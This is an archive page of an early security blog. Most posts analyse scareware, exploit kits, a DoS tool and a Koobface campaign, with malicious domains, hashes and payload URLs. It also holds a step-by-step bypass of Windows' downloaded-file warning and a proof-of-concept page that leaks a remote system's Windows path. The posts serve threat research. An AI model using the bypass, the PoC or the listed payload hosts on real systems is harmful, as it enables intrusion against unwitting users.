EvilFingers

EFBlog Moved Permanently

2010-01-07T03:11:00.003-11:00

Hello Readers,

Thank you for your uninterrupted support. We hope that you had a great time during your long weekends and holidays. We are getting back into action with the first step of moving EFBLOG permanently to http://EF.KAFFENEWS.COM. Sorry for any inconvenience. Kindly, follow us there. Thank you once again for all your support.

Kind Regards,
EF

Crimeware in 2009

2010-01-05T01:00:00.000-11:00

"Crimeware in 2009" presented in one document all that was channeled through this blog during the year in question on crimeware and associated hazards.

There are a total of 262 pages and is divided by the most relevant topics that describe the criminal activities that were a source of news on this blog. Has two indices for getting the news in a simple (content) and another on the images (image index).

Then let some of the themes they found in the document in question:

Current business outlook caused by crimeware
Framework Exploit Pack for botnets general purpose
Framework Exploit Pack for botnets particular purpose
Services associated with crimeware
Intelligence in the fight against crimeware
Campaigns of spread and infection
Other Exploits packs that were investigated

Short information
Malware Intelligence
Annual compendium of information. Crimeware in 2009
262 pages
Spanish language

Download

Jorge Mieres
Malware Intelligence Blog

Anti-Virus Live 2010. Talking with the enemy

2009-12-25T15:43:00.000-11:00

Generally one has the false belief that malicious code is trivial that any technical problems solved by just formatting the system or acquire any of the known anti-malware market offers today.

However, on the one hand, the reality is that behind the development of malware hides a very large business in which every day must be added more "associates". Moreover, what happens when we plan to buy this antivirus is just the opposite.

This is the case of the Anti-Virus Live 2010 or what is the same, Anti-Virus Elite 2010 malware scareware type (or rogue), which makes it quite evident that the processes and mechanisms by which deceives order to steal your money are well oiled and well thought out.

At first instance, as is usual in this type of threat, the strategy is supported by a website that is used to "bait" to lure potential victims, saying all sorts of justifications to "prove" some credibility on the false antivirus, which complements a typical disinformation campaign.

So far, nothing interesting. Except for the possibility of requesting assistance via chat. Interesting. Then check if this condiment is legitimate ... Yes it's.

Consequently, communication was established through this option with the surprise that immediately got response from the other side. You can then take the short conversation via chat.

We basically said Dennis, the merchant, which among other things the course antivirus is compatible with all versions of Windows, its value is USD 27, which only supports English and no enterprise version and no problems eliminating conficker.

Let us briefly discuss these points. Obviously, the scareware must be compatible with all versions of Windows as it's this time the audience that the threat is directed. Why? Simply because more than 80% of people use Windows as the main operating system in home environments where the potential for finding a particular victim increases. This way is much more likely "to close business."

For the same reason there isn't version for GNU/Linux, even, not even version oriented businesses; because usually, the companies have a higher level of security where probably the scareware not find results.

Why English and not Russian? Because English is the third most popular language. Its cost, USD 27, represents a competitive value that's commensurate with the average cost of legitimate antivirus programs. And regarding conficker, whether by koobface wondering, the answer would have been the same.

A very interesting fact that helps to understand its true magnitude of the illegal business of malware, is the error committed by the "affiliate" Dennis when requesting the URL to buy a false solution. It gives us the url registryfix.com/purchase and time of comment that is not in question the supposed solution, offering the proviso antivirus-elite.com/purchase the corresponding url.

However, we were trying to close "business" by Anti-Virus Live 2010 and not Anti-Virus Elite 2010, making it clear that this is the same threat under different names. Even the same "partner" manages and markets various alternatives under similar mode. In this case, also offering the fraudulent sale of Registry Fix, another associated with NoAdware and scareware ErrorClean.

From a technical point of view, the domain of this threat is in the IP address 204.232.131.12, hosted by the ISP Rackspace, located in the city of Hoboken in the United States under AS27357.

According to the history of this AS, the activities generated by malicious code are important

From the website you download an executable named setup.exe (MD5: C50DC619E13345DEC2444B0DE371DFD4) which corresponds to scareware installer with a low rate of detection.

As we see, the cybercriminals don't get tired of spreading increasingly aggressive threats that accompany the infection process through marketing campaigns, even very similar to those used by many antivirus companies.

RussKill. Application to perform denial of service attacks

2009-12-17T04:12:00.002-11:00

Conceptually speaking, a DoS attack (Denial of Service attack) is basically bombarded with requests for a service or computer resource to saturate and the system can not process more data, so those resources and services are inaccessible, "denying" the access to anyone who wants them.

From the standpoint of computer security, Denial of Service attacks are a major problem because many botnets are designed to automate these attacks, especially those of particular purpose, taking advantage of computational power offered by the network of zombies. In this case, the attack is called Distributed Denial of Service (DDoS).

Moreover, under the framework of the concept of cyberwarfare, this type of attack is part of the armament "war" through which virtual scenarios presented conflicts between their requirements as to neutralize a state vital services.

RussKill is a web application that is classified within these activities and that despite being extremely simple, both in functionality and in the way of use, is an attack that could be very effective and difficult to detect.

As is customary in the current crimeware, the web application is of Russian origin and has a number of fields with information about how and against whom to carry out the attack, letting you configure the packet sequence, ie the flow in amount. The option "Hide url" is a self-defensive measure designed to ensure that the server is detected.

Although several methods of DoS attacks, RussKill makes use of the attacks HTTP-flood and SYN-flood. In both cases the servers for flood victims through http requests and packets with fake source IP addresses respectively.

As I said at first, the denial of service attacks are a danger for any information system, regardless of the platform that supports services and applications such, in this case site, demonstrates the ease with which an attack of this type can run.

Related information
DDoS Botnet. New crimeware particular purpose

Jorge Mieres
Pistus Malware Intelligence

Using Nmap Remotely Through F5 FirePass VPN

2009-12-11T00:19:00.002-11:00

Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.

I was connected to a network remotely through the company's F5 VPN appliance and I wanted to scan the internal network.

It looked like:

Microsoft Windows XP [Version 5.1.2600]

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed "Enter" I got:

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time

WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:

LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the -- unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun. I don't think Solar is can support advanced localhost scans. You can probably use "-PN -sT localhost" though.

QUITTING!

Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played "Imaginary Linux on Windows" and added the option "-e eth0" which specifies using the Ethernet device indexed at 0 and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time

Interesting ports on XXXXX (192.168.0.1):

PORT STATE SERVICE

445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables

2009-12-10T23:27:00.002-11:00

I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K, let's see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.

Me: "Honey, go to http://www.teamviewer.com, can you download it?"

Her: "yes, but when I run the setup.exe it says something weired like 'windows has blocked this software because it can't verify the publisher' and it won't let me install"

Me: "O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ':Zone.Identifier' just before the last quotes. What do you see?"

Her: "I see something like ZoneId=3, now what?"
Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye"

After 10 minutes I get an SMS "thanks honey it worked!!!".

Well we found a bug, I wouldn't really call it a "Privilege Escalation" but I guess you don't have to be a hacker to bypass windows security restrictions :)

Fusion. A concept adopted by the current crimeware II

2009-12-10T03:53:00.000-11:00

It's increasingly common for research processes we find that on the same server are housed, "operating" actively, several crimeware Exploit Pack type from which control and manage the zombies that are part of his fraudulent business .

A while ago we commented on ElFiesta and ZeuS coexisting in the same environment, and meet the same objectives.

This time, the merger is between Fragus (an increasingly popular crimeware) and ElFiesta. Both packages are hosted on the same server. However, although the potential doesn't mean they are being operated by the same botmaster.

The domain in which they are staying is as follows:

Where is in Fragus http://hotgirldream.net/far/ and ElFiesta for, is hosted on another folder, the path is http://hotgirldream.net/content/. As we can see, share the server with IP address 210.51.166.233, located in Yizhuang Idc Of China Netcom, Beijing.

This demonstrates that opportunities for "business" don't go only by the sale of crimeware, malware, exploit pack and other fraudulent activities, but another alternative is to provide the infrastructure for, in terms of its computing capacity, streamline processes criminal.

Disinformation campaign to spread malware

2009-12-06T05:10:00.001-11:00

Disinformation is basically distort or manipulate the information so that the recipient end believing something completely untrue, and which the originator obtains an advantage. For example, the rumor is a tool used in the campaigns of disinformation. In turn, misinformation is a tool that provides useful information in a timely manner (Intelligence).

Transferred this concept to the computer field, is neither more nor less than a social engineering methodology that increasingly used by developers of malicious code to try to attract the confidence of users and thus take advantage of this condition to execute the process of infection.

Usually we see on the pages scareware rate spread malware (also known as rogue), where we find pictures of certifications such as Virus Bulletin and AV-Comparatives, or some other like PC Magazine or PC World that don't fulfill the same function as the magazine formerly known as they are enjoying "trust" among the public.

Another alternative is focusing its efforts on trying to prove that this "solution" (scareware) is the best. This is done through false compare where it gets questioned the detection levels of antivirus companies widely known in the market.

Both strategies of deception appeal to what is known under the concept of authority represented by these certificates and publications in the "real" antivirus and information technology respectively.

In this regard, I recently discovered another method of deception is also directed to issue disinformation with the aim of encouraging users to believe the information and act accordingly.

It's pretending that the file is provided free of malicious code, also appealing to authority, but in this case, enabling organizations to verify the integrity of files through an online process to submit the files to antivirus solutions with greater confidence in the market. For example, services such as VirusTotal or VirScan. We then see a catch.

The domains involved are housed in the IP 213.5.64.20, located in the Netherlands (Netherlands Altushost Inc) but not all spread the threat. Among them:

safehostingsolutions.com/download.html
fileaddiction.com/download.html
freedatatransfer.com/download.html
freedownloadthanks.com/download.html
megasecuredownload.com/download.html
qualityupload.com/download.html

The files that are downloaded are the following names:

Hpack Generator.exe (91b31ea8c551397cd5b1d38ec1aa98dd) - Result: 8/40 (20.00%)
UAV Generator.exe – Idem
Knight Generator.exe – Idem
LG Generator.exe – Idem
Kings Generator.exe – Idem
DBlocks Generator.exe – (53e3256bef0352caf794b641f93a32d5) - Result: 6/40 (15%)

As can be seen that besides the new proposal for cheating despite being quite trivial has a high impact on effectiveness, the level of detection in the two malicious codes is very low, representing only 15% and 25% of 41 antivirus engines.

It isn't to panic but to be vigilant.

Related information
A recent tour of scareware XVIII
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
Deception techniques that do not go out of style

Jorge Mieres
Pistus Malware Intelligence

A brief glance inside Fragus

2009-12-04T15:20:00.001-11:00

Fragus is a web application developed for the management of zombies, of Russian origin, who long to live has been inserted crimeware clandestine market with an affordable price (USD 800) if we consider criminal capabilities it offers.

The crimeware is basically composed of five sections: Statistics, Files, Sellers, Traffic links and Preferences. Each handles a specific task and they all complement one another.

In the Files panel is handling the executable file that will spread.

Sellers are in management exploits. In this case, corresponding to the first version of Fragus.

Regarding the Traffic links module, allows the "previous" and setting the iframe script that will be injected into the page that shall act as "driver" for the implementation of the configurator exploits the previous panel, that look for vulnerabilities on the victim machine .

However, one of the patterns identified in each of the packages of this style is the Statistical module. This module provides the intelligence necessary for the botmaster get a detailed report of the teams not only zombies but also on certain aspects needed to know in detail what should exploit to run.

Another interesting patterns we can deduce on the basis of this information is that the operating system is exploited Windows XP with Internet Explorer, the exploit more effectively, despite being very old (MS06-014) is the one that takes the vulnerability in MDAC and that among the countries with the highest rates of infection are the USA and Korea.

This represents a common scenario where perhaps the relevance factor is the inference that perhaps common situation due to the large volume of user who uses the Microsoft operating system on a non-licensed, which leads to not update .

Finally, another important factor that must not be overlooked is that cyber-criminals are not interested in the controversy surrounding the safety levels offered by one or another operating system (Windows, GNU/Linux and Mac OS) but all fall into the same category of "potential victims" because the vulnerability exploited in layer 7.

Related information

Fragus. Nueva botnet framework In-the-Wild
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Liberty Exploit System. Otra alternativa (...) para el control de botnets

Jorge Mieres
Pistus Malware Intelligence

Exploiting WebView through Internet Explorer to remotely discover windows directory

2009-12-03T20:51:00.002-11:00

As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.

In Windows 98 a new look was introduced called "WebView" which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML Templates had the extension "htt". In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the "htt" files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives until today deeply inside Windows XP's code in two modules inside the system32 folder:
1) Webvw.dll
2) Mshtml.dll

Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering & Rendering used Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE
Default = "%SystemRoot%\Web\wvleft.bmp"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE
Default = "%SystemRoot%\Web\wvline.gif"

Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system's path.
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:


#define REG_WEBVIEW_TEMPLATE_MACROS
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {
 if (SIZEOF(char) == nCharSize) {
  SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
 } else {
  ASSERT(nCharSize == SIZEOF(WCHAR));
  SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
 }
}

void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {
 TCHAR szExpansion[MAX_PATH];
 szExpansion[0] = TEXT('\0');
 TCHAR szTCharMacro[MAX_PATH];

 ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
 TCHAR szKey[MAX_PATH];
 lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
 StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));
 StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
 HKEY hkMacros;
 if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
  DWORD dwType;
  DWORD cbData = SIZEOF(szExpansion);
  SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
  RegCloseKey(hkMacros);
 }

 ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
 if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
  if (!_szTemplateDirPath[0]) {
   GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
  }

  *ppszExp = _szTemplateDirPath;

 } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
  if (!_szThisDirPath[0]) {
   _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
  }
  *ppszExp = _szThisDirPath;

 } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
  if (!_szThisDirName[0]) {
   _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
  }
  *ppszExp = _szThisDirName;

 } else {
  ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
  *ppszExp = _szExpansion;
 }

 return _StrLen(*ppszExp);
}

In Windows XP the variables "%THISDIRPATH%" and "%THISDIRNAME%" were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.

The Proof Of Concept code (Remote WebView Macro Translation):
Save on a remote host with an htt extension and replace "http:///filter_trap.htt
--------------------------- filter_trap.htt start --------------------------------
[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]
[div id="LOGOLINE"]%LOGOLINE%[/div]
[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]
[script]
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
[/script]
--------------------------- filter_trap.htt end --------------------------------

Koobface campaign spread through Blogspot

2009-12-01T16:12:00.000-11:00

A massive campaign to spread the worm is Koobface In-the-Wild using blogs as a strategy generated from the Blogspot service.

Koobface has become a nightmare for social networks and even though its propagation strategies do not change, this malware is almost two years of activity with a significant rate of infection, making it one of the largest botnets today.

Blogspot domains used as cover for the spread are:

pannullonumair.blogspot.com
haladynalatosha.blogspot.com
macdougalmuskan.blogspot.com
mailletjamaica.blogspot.com
ledrewrooney.blogspot.com
brasenoktayoktay.blogspot.com
toludestany.blogspot.com
edgarbillison.blogspot.com
piotrowiczlyanne.blogspot.com
brochoiredeedee.blogspot.com
decuyperantohny.blogspot.com
derrenpassini.blogspot.com
elsenelsenumthun.blogspot.com
elsyelsysalah.blogspot.com
fanjonappuappu.blogspot.com
fredrikadantos.blogspot.com
genelleabril.blogspot.com
gilkerharjyot.blogspot.com
hadzilashawn.blogspot.com
insalacotecwyn.blogspot.com
janitasaels.blogspot.com
jodelinscheufler.blogspot.com
jones-allentammey.blogspot.com
jurgisbooty.blogspot.com
karanjeetisoardi.blogspot.com
dralleboyeboye.blogspot.com
maidenhermann.blogspot.com
messer-bustamantetimpriss.blogspot.com
murachaniananoushka.blogspot.com
nevnevsculthorpe.blogspot.com
parrisvistisen.blogspot.com
porierkunlekunle.blogspot.com
rotermundraimon.blogspot.com
sharonyacorvil.blogspot.com
sodorabardan.blogspot.com
tendaiblunk.blogspot.com
turskeybrianna.blogspot.com
zhuochengbate-pelletier.blogspot.com
ziziziziboyter.blogspot.com

Who accesses one of these domains redirected to a page that simulates the typical YouTube screen. We then see a catch.

Immediately after, try to download a binary called "setup.exe" (md5 6d8ac41c64137c91939cced16cb5f2fe) which has a low average detection rate. This binary, in turn takes care of downloading and executing other malicious code.

v2prx.exe (36/41 - 87.80%)
go.exe (7/41 - 17.07%)
fb.75.exe (22/41 - 53.66%)
v2newblogger.exe (36/41 - 87.80%)
v2captcha.exe (39/41 - 95.12%)
v2googlecheck.exe (40/41 - 97.56%)

Each of these files are downloaded from domains Style "homemadesandwiches.com/.sys/?getexe=ff2ie.exe".

The binary v2captcha.exe handles breaking the captcha that asks for registration blogspot blogs, creating massive randomly and the same, and then redirected to the download of Koobface through, as I mentioned at the beginning, a false YouTube page that uses the same visual social engineering approach used in other campaigns similar spread.

Undoubtedly Koobface is another malicious code that uses persistence despite many of its variants are detected by most antivirus companies.

Related information
Symbiosis malware present. Koobface

Jorge Mieres
Pistus Malware Intelligence

Avatar - The Movie - HD Trailer 1080p

2009-12-01T07:15:00.003-11:00

This seems to be like a very nice and well made movie. Looking at the trailer, I thought that I should share it with our blog viewers.

Enjoy the Trailer! Copyrights Reserved to the Movie Makers!

EF

JustExploit. New Exploit kit that uses vulnerabilities in Java

2009-11-29T13:51:00.000-11:00

Crimeware industry still rising, and just as illegal marketing of web applications that seek to automate the process of infection through the exploitation of vulnerabilities.

This time, the proposal called JustExploit. This is a new Exploit Pack of Russian origin who has a seasoning that is increasingly being taken into account most heavily crimeware developers: the exploitation of vulnerabilities in Java. That is, in addition to exploit known vulnerabilities for MDAC and PDF files, exploits Java in all those computers that have installed the runtime.

The catch statistics for the module (Intelligence) which clearly shows that from this application you are controlling a large number of computers using different browsers and different operating systems, among which is the famous Windows Seven.

Another interesting fact which emerges from this module is the high rate of effectiveness which has the exploitation of the vulnerability in Java, with even a greater success rate with respect to two other vulnerabilities (MDAC and PDF).

Through a file "index.php" script that has a dull, JustExploit try to run three exploits for vulnerabilities CVE-2008-2992, CVE-2009-0927 and CVE-2008-5353. Here we see part of the script.

Among the files that are downloaded, is the operator of Java, called "sdfg.jar", with a low detection rate. According to VirusTotal, only 15 of 41 antivirus engines.

In addition, the kit includes the following downloading malicious files (which for the moment, also have a very poor detection rate):

example.pdf 8/41 (19.51%)
annonce.pdf 7/41 (17.07%)
load.exe 25/41 (60.98%)

This activity is In-the-Wild relatively short time ago and is a dangerous attack vector that is actively being used by botmasters, as we have seen, with striking effectiveness.

Espionage by malware

2009-11-24T01:06:00.001-11:00

During this month remember having breakfast with a piece of news for many media seem to be new or exclusively connected with some Hollywood films, giving it a connotation of "amazing." I refer to espionage through computerized means.

Then leave a screenshot of the news, in which it's evident that the malicious code are also part of the operations of intelligence in different contexts, both from a viewpoint clearly fraudulent (in the case of computer criminals) as which shields under the "flag" to protect and safeguard the interests of a State (for many intelligence services), which seek to take advantage and/or neutralize the potential actions framed within the context of hostility.

Indeed, in many cases, touching the legality of actions.

According to the information that appears in the article, the most important intelligence service of Israel (Mossad) has used a type of malicious code trojan to obtain confidential information and critiques on nuclear facilities in Syria.

The fact that Mossad used a program to spy isn't a novelty because, like its American counterpart (CIA) and many other formerly used Promis as a resource for spying.

(Someday maybe encourage me to write something about the programs used by intelligence services around the world ;P)

The point is that regardless of the impact of the news, malicious code are without doubt one of the most used for obtaining information, including at government and military, even among companies seeking to obtain confidential data that enable disclose their activities and win competition advantages.

Now, any organization or government entity may be a victim of espionage, and these activities must also be addressed by Information Security. So what can be done to counteract or neutralize these activities, which in most cases are handled on the edge of illegality, the truth isn't easy. However, implementing a strategy of misinformation can be a good practice of counterintelligence.

Ultimately it's easy to deduce that such maneuvers aren't only stock listed as "ghosts" or within the genre "science fiction" films themselves, but every day we are potential victims of the persistent attempts of malware writers seeking to break our security frameworks to obtain secret information.

Related information
Computer Intelligence, Information Security and Cyber-War
CYBINT in the business of Russian cyber-crooks

Jorge Mieres
Pistus Malware Intelligence

DDoS Botnet. New crimeware particular purpose

2009-11-23T05:19:00.003-11:00

An attack by Denial of Service (DoS) consists basically of abuse of a service or resource by successive requests, either intentional or negligent, which eventually break the availability of such service or resource temporarily or completely.

When this type of attack is performed using the processing power of an important set of computers carrying out the abuse of requests synchronously, we are witnessing an attack Distributed Denial of Service (DDoS).

DDoS attacks aren't new at present (such as Blaster malicious code designed for this kind of attacks against Microsoft in 2003, is a classic example) and their use is a resource of any malicious activity connotation, even mafia.

In this sense, most botnets general purpose contemplated as part of its bid criminal attacks distributed denial of service by taking advantage of benefits offered by the zombies that are part of the network, and the particular purpose to perform a type specific attack against a specific target also, is typical of today.

From a perspective on cyber war, the DDoS also plays a fundamental role in the offensive mode used in this digital war also known as Cyber-Warfare, and is a resource that is part of a strategy involved in the attack analysis CYBINT (CyberIntelligence).

However, under this scenario the attack may also be used defensively in an analytical strategy to assess the constraints outlined critical services of a State.

But whatever purposes they hide behind the attack, cyber-criminals (especially those of Russian origin) constantly seek to facilitate the issue by offering crimeware developed for use exclusively with criminal minds.

The point is that a new web application for controlling botnets, is In-the-Wild, marketed in the Russian black market at a "competitive", USD 350.

The crimeware is designed to recruit and train a botnet zombies (particular purpose) intended exclusively for attacks of the type of DDoS SYN Flood, ICMP Flood, UDP, HTTP and HTTPS. In the following screenshot shows part of the configuration of the application written in PHP.

Among its outstanding features are the ability to run as a service (which is part of its defense strategy), control and administration (C&C) is done through HTTP, integration with other crimeware of his style, recording of activities (logs) with information processed on each attack (Intelligence), among many others.

I believe that research of this type of criminal activity must have the touch method that offers the activities of intelligence, as though for a home user this type of attack may matter little, not true when what is at stake are assets of the companies. As security professionals should be aware of the state of the art of crimeware, and incorporate measures of intelligence in their work.

Information related
Russian crimeware prices. Part 2
Russian Trade crimeware private versions ...
ZeuS and power Botnet zombie recruitment
Process Automation anti-analysis II
Eleonore Exploits Pack. New Crimeware In-the-Wild
Looking closely at the structure of Unique Sploits Pack
Adrenaline botnet: command area. The Russian crimeware ...
YES Exploit System. Another crimeware Made in Russia
Barracuda Bot. Botnet actively exploited
ElFiesta. Recruitment zombie across multiple threats

Jorge Mieres
Pistus Malware Intelligence Blog

Is this a Rogueware?

2009-11-20T09:20:00.016-11:00

When looking through the MySharewareSite.com, I found the following tool and thought of finding more info about the tool.

[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
When trying to click on the following site links:
hxxp://w w w.internetsecurity2.com/?id=avanquest_system_suite
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/shots/avanquest_system_suite.gif
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

When throwing it into JSunpack we received the following response:

Sections ( CODE .rsrc )
File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, PECompact2 compressed
Packer: PECompact V2.X-> Bitsum Technologies,PECompact 2.xx --> BitSum Technologies,ExeShield Protector V3.6 -> www.exeshield.com,
Size: 193536 bytes,
MD5: 161f2a3e3c41dbd451021a3cc1fd2577

Based on the MD5, VirusTotal gave the following results:

LINK: http://www.virustotal.com/analisis/6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc-1251400950

PrevX had a report for the same MD5:
http://info.prevx.com/aboutprogramtext.asp?PX5=48A52DBD003CF3E7F47D02C51A2AB30007864133

File size: 193536 bytes
MD5 : 161f2a3e3c41dbd451021a3cc1fd2577
SHA1 : 7fb29202fab964bcd48f1b5309021876e5175784
SHA256: 6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1000
timedatestamp.....: 0x2A425E19 (Sat Jun 20 00:22:17 1992)
machinetype.......: 0x14C (Intel I386)

( 2 sections )
name viradd virsiz rawdsiz ntrpy md5
CODE 0x1000 0x80000 0x2A200 8.00 414b946f666a25e9a9ead73ea1dd1403
.rsrc 0x81000 0x5000 0x4E00 5.21 6d690ad7615832e8c76b28a3f017c377

( 11 imports )

> advapi32.dll: RegQueryValueExA
> comctl32.dll: ImageList_SetIconSize
> gdi32.dll: UnrealizeObject
> kernel32.dll: LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree
> ole32.dll: CreateStreamOnHGlobal
> oleaut32.dll: SysFreeString
> shell32.dll: ShellExecuteA
> urlmon.dll: URLDownloadToFileA
> user32.dll: GetKeyboardType
> version.dll: VerQueryValueA
> wininet.dll: DeleteUrlCacheGroup

When opening in Firefox v3.0.15, I got the following response. It is good that Firefox caught this:

Norton Safeweb gives the following results:

DIRECT LINK: http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.internetsecurity2.com%2F%3Fid%3Davanquest_system_suite&x=15&y=12

[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]
Threat Report

Total threats found: 11

Small-whitebg-red Viruses (what's this?)

Threats found: 10
Here is a complete list:
Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/trendmicro_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/registry_sweep_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/kaspersky_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Trojan Horse
Location: hxxp://www.internetsecurity2.com/suites/zonealarm_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/norton_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_easy_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/panda_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
